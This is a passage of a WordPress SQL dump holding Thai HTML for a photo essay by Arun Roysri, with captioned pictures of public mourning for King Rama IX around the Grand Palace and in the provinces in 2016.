เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:24:16', '2018-11-12 07:24:16', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4387, 3, '2018-11-12 14:25:25', '2018-11-12 07:25:25', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" 